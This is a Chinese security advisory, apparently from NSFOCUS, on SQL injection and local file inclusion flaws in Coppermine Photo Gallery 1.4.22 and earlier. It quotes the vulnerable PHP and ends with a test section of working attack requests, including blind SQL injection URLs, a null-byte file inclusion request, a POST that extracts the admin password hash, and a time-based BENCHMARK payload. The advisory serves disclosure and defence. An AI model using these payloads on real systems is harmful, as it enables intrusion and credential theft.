安全研究

安全漏洞
Coppermine Photo Gallery多个SQL注入和本地文件包含漏洞

发布日期:2009-05-18
更新日期:2009-05-19

受影响系统:
Coppermine Photo Gallery <= 1.4.22
描述:
BUGTRAQ  ID: 35009

Coppermine是用PHP编写的多用途集成Web图形库脚本。

在Coppermine的/includes/init.inc.php文件的42-65行,远程攻击者可以绕过防register_global保护,执行SQL盲注或本地文件包含攻击:

    $keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST', 'keysToSkip', 'register_globals_flag', 'cpgdebugger');
    
    if (ini_get('register_globals') == '1' || strtolower(ini_get('register_globals')) == 'on') {
        $register_globals_flag = true;
    } else {
        $register_globals_flag = false;
    }
    
    if (get_magic_quotes_gpc()) {
            if (is_array($_POST)) {
                    foreach ($_POST as $key => $value) {
                            if (!is_array($value))
                                    $_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
                            if (!in_array($key, $keysToSkip) && isset($$key) && $register_globals_flag) unset($$key);
                    }
            }
    
            if (is_array($_GET)) {
                    foreach ($_GET as $key => $value) {
                            unset($_GET[$key]);
                            $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
                            if (!in_array($key, $keysToSkip) && isset($$key) && $register_globals_flag) unset($$key);
                    }
            }

$_COOKIE和$_SERVER变量存在同样问题。在magic_quotes_gpc = off时,可绕过保护通过GET或POST请求定义GLOBALS。

以下是exploit攻击的方式。在./thumbnails.php文件的79行:

    if (isset($_GET['sort'])) $USER['sort'] = $_GET['sort'];
    if (isset($_GET['cat'])) $cat = (int)$_GET['cat'];        <== bypass the int cast
    if (isset($_GET['album'])) $album = $_GET['album'];

    ...
    if (is_numeric($album)) {
    ...
        
    } else {
        $album_set_array = array();
        if ($cat == USER_GAL_CAT)
                $where = 'category > ' . FIRST_USER_CAT;
           else
                $where = "category = '$cat'";

        $result = cpg_db_query("SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} WHERE $where");  <==  Vulnerable query

-----------------------------------------------------------------------------------------

还可以通过本地文件包含覆盖$USER数组,具体来说是$USER['lang']变量。在/include/functions.inc.php文件的128-135行:

    function user_get_profile()
    {
            global $CONFIG, $USER;

            if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) {
                    $USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data']));
                    $USER['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');        <== we bypass it
            }
      
        if (!isset($USER['ID']) || strlen($USER['ID']) != 32) {
                    list($usec, $sec) = explode(' ', microtime());
                    $seed = (float) $sec + ((float) $usec * 100000);
                    srand($seed);
                    $USER=array('ID' => md5(uniqid(rand(),1)));
            } else {
                    $USER['ID'] = addslashes($USER['ID']);
            }

            if (!isset($USER['am'])) $USER['am'] = 1;
    }

/includes/init.inc.php文件的318-346行:

    if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
    {
            $CONFIG['default_lang'] = $CONFIG['lang'];          // Save default language
            $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
    }
    elseif ($CONFIG['charset'] == 'utf-8')            <== default configuration
    {
               include('include/select_lang.inc.php');
            if (file_exists('lang/' . $USER['lang'] . '.php'))
            {
                    $CONFIG['default_lang'] = $CONFIG['lang'];      // Save default language
                    $CONFIG['lang'] = $USER['lang'];
            }
    }
    else
    {
            unset($USER['lang']);
    }

    if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))
    {
                unset($CONFIG['default_lang']);
    }

    if (!file_exists("lang/{$CONFIG['lang']}.php"))
      $CONFIG['lang'] = 'english';

    // We load the chosen language file
    require "lang/{$CONFIG['lang']}.php";        <== vulnerable include

-----------------------------------------------------------------------------------------

如果启用了注册功能,能够通过口令创建或修改相册的用户可以执行sql盲注。

./db_input.php文件:

    $event = isset($_POST['event']) ? $_POST['event'] : $_GET['event'];
    switch ($event) {

    ...

    case 'album_update':
        if (!(USER_ADMIN_MODE || GALLERY_ADMIN_MODE)) cpg_die(ERROR, $lang_errors['perm_denied'], __FILE__, __LINE__); <== USER_ADMIN_MODE is TRUE if we are logged in

        $aid = (int)$_POST['aid'];
        $title = addslashes(trim($_POST['title']));
        $category = (int)$_POST['category'];
        $description = addslashes(trim($_POST['description']));
                $keyword = addslashes(trim($_POST['keyword']));
        $thumb = (int)$_POST['thumb'];
        $visibility = (int)$_POST['visibility'];
        $uploads = $_POST['uploads'] == 'YES' ? 'YES' : 'NO';
        $comments = $_POST['comments'] == 'YES' ? 'YES' : 'NO';
        $votes = $_POST['votes'] == 'YES' ? 'YES' : 'NO';
        $password = $_POST['alb_password'];                    <== this var is not addslashed
                $password_hint = addslashes(trim($_POST['alb_password_hint']));
        $visibility = !empty($password) ? FIRST_USER_CAT + USER_ID : $visibility;

        if (!$title) cpg_die(ERROR, $lang_db_input_php['alb_need_title'], __FILE__, __LINE__);

        if (GALLERY_ADMIN_MODE) {
            $query = "UPDATE {$CONFIG['TABLE_ALBUMS']} SET title='$title', description='$description', category='$category', thumb='$thumb', uploads='$uploads', comments='$comments', votes='$votes', visibility='$visibility', alb_password='$password', alb_password_hint='$password_hint', keyword='$keyword' WHERE aid='$aid' LIMIT 1";
        } else {
            $category = FIRST_USER_CAT + USER_ID;
            $query = "UPDATE {$CONFIG['TABLE_ALBUMS']} SET title='$title', description='$description', thumb='$thumb',  comments='$comments', votes='$votes', visibility='$visibility', alb_password='$password',        <== vulnerable query alb_password_hint='$password_hint',keyword='$keyword' WHERE aid='$aid' AND category='$category' LIMIT 1";
        }

        $update = cpg_db_query($query);

在查询中使用之前没有对$_POST['alb_password']执行addslash操作。init.inc.php中过滤了所有_GET、_POST和_REQUEST变量:

    // Do some cleanup in GET, POST and cookie data and un-register global vars
    $HTML_SUBST = array('&' => '&amp;', '"' => '&quot;', '<' => '&lt;', '>' => '&gt;', '%26' => '&amp;', '%22' => '&quot;', '%3C' => '&lt;', '%3E' => '&gt;','%27' => '&#39;', "'" => '&#39;');

    ...
    $_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
    ...
    $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
    ...
    $_REQUEST[$key] = strtr(stripslashes($value), $HTML_SUBST);

但没有处理反斜线(\),因此可以操作查询在$_POST['alb_password']的默认注入反斜线并在$_POST['alb_password_hint']参数中执行SQL。

------------------------------------------------------------------------------------------

某些配置的Coppermine中还存在一些SQL盲注。在./displayecard.php文件的26-38行:

    if (!isset($_GET['data'])) cpg_die(CRITICAL_ERROR, $lang_errors['param_missing'], __FILE__, __LINE__);

    $data = array();
    $data = @unserialize(@base64_decode($_GET['data']));

    // attempt to obtain full link from db if ecard logging enabled and min 12 chars of data is provided and only 1 match
    if ((!is_array($data)) && $CONFIG['log_ecards'] && (strlen($_GET['data']) > 12)) {
            $result = cpg_db_query("SELECT link FROM {$CONFIG['TABLE_ECARDS']} WHERE link LIKE '{$_GET['data']}%'");
            if (mysql_num_rows($result) === 1) {
                    $row = mysql_fetch_assoc($result);
                    $data = @unserialize(@base64_decode($row['link']));
            }
    }

<*来源:GiReX
  
  链接:http://www.milw0rm.com/exploits/8713
        http://secunia.com/advisories/35144/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

[target]/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=1%23    true
[target]/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=2%23    false

GET /[path]/index.php?GLOBALS[USER][ID]=5b83a5f92603efcdb65d47c9a2991d6b&GLOBALS[USER][lang]=../README.txt%00 HTTP/1.1
Host: [host]
Connection: close

POST /[path]/db_input.php HTTP/1.1
Host: [host]
Keep-Alive: 300
Connection: keep-alive
Cookie: [your_cookies]
Content-Type: application/x-www-form-urlencoded

event=album_update&title=x&aid=[YOUR_ALBUM_ID]&alb_password=%5C&alb_password_hint=,title=(SELECT user_password FROM cpg14x_users WHERE user_id=1) WHERE aid=[YOUR_ALBUM_ID]%23

用以下php代码注入:
<?php
$injection = "%' OR BENCHMARK(999999, md5(0))#";
$injection = urlencode(base64_encode(serialize($injection)));
?>

然后:
GET http://[host]/[path]/displayecard.php?data=[$injection] HTTP/1.1

http://www.milw0rm.com/exploits/8736

建议:
厂商补丁:

Coppermine
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.chezgreg.net/coppermine/

浏览次数:4460
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客